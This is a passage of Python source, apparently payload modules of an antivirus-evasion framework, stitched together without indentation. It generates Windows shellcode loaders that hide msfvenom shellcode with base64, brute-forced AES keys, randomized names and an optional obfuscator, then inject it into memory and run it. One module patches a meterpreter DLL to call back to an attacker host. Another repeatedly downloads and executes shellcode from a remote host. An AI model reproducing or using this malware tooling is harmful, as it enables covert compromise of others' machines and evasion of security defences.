payload_code += RandToday + ' = datetime.now()\n'
payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
payload_code += '\t' + rand_shellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
def generate(self):
imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"
inject_func = helpers.randomString()
getexec_func = helpers.randomString()
main_func = helpers.randomString()
beaconthr_func = helpers.randomString()
retry_var = helpers.randomString()
if self.required_options["BEACON"][0].lower() == 'n':
global_vars = "%s = False" % retry_var
elif self.required_options["BEACON"][0].lower() == 'y':
global_vars = "%s = True" % retry_var
interval_var = helpers.randomString()
opener_var = helpers.randomString()
global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)
shellcode_var = helpers.randomString()
ptr_var = helpers.randomString()
ht_var = helpers.randomString()
buff_var = helpers.randomString()
inject = "def %s(%s):" % (inject_func, shellcode_var)
inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var
url_var = helpers.randomString()
shellcode_var = helpers.randomString()
info_var = helpers.randomString()
thread_var = helpers.randomString()
thread_name = helpers.randomString()
thread_name2 = helpers.randomString()
getexec = "def %s(%s):" % (getexec_func, url_var)
getexec += "\n\ttry:"
getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
getexec += "\n\texcept Exception:"
getexec += "\n\t\tpass\n"
url_var = helpers.randomString()
beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
beaconthr += "\n\twhile True:"
beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
beaconthr += "\n\t\t%s.start()\n" % thread_var
main = "def %s():" % main_func
main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
main += "\n\tif %s is True:" % retry_var
main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
main += "\n\t\t%s.setDaemon(True)" % thread_var
main += "\n\t\t%s.start()" % thread_var
main += "\n\t%s(%s)" % (getexec_func, url_var)
if self.required_options["BEACON"][0].lower() == 'y':
main += "\n\twhile True:"
main += "\n\t\ttime.sleep(0.1)"
main += "\nif __name__ == '__main__':"
main += "\n\t%s()" % main_func
PayloadCode = imports + global_vars + inject + getexec + beaconthr + main
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
meterpreterDll, headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
PayloadCode = 'import ctypes\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
PayloadCode = 'import ctypes\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\t' + 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["inject_method"][0].lower() == "heap":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
PayloadCode = 'import ctypes\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
PayloadCode = 'import ctypes\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
known_plaintext_string = helpers.randomString()
plaintext_string_variable = helpers.randomString()
key_guess = helpers.randomString()
secret_key = helpers.randomString()
small_constrained_key_variable = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode)
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n'
PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n'
PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n'
PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n'
PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n'
PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n'
PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
